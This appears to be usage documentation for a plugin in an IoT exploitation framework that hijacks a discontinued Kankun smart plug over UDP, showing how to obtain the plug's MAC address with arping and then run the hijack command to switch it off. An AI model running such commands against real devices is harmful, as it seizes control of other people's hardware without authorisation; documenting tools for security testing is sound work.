As of now all, UDP based proprietary communication will be grouped here. Eventually, it will be changed to something else.


This is an exploit for a Smart plug called Kankun, manufactured by a Chinese vendor ikonke.com. It is out of production now.

Usage details:

ef> run udp.kankun.hijack -h


To run the plugin you need the IP address and the MAC address of the plug. Let’s assume that you know the IP address. In this example it’s Get the MAC address with the IP address.

$ arping -f -I wlp4s0
ARPING from wlp4s0
Unicast reply from [00:15:61:BD:49:CB]  35.143ms
Sent 1 probes (1 broadcast(s))
Received 1 response(s)

Run the test with the collected information.

ef> run udp.kankun.hijack -r -m 00:15:61:BD:49:CB -c off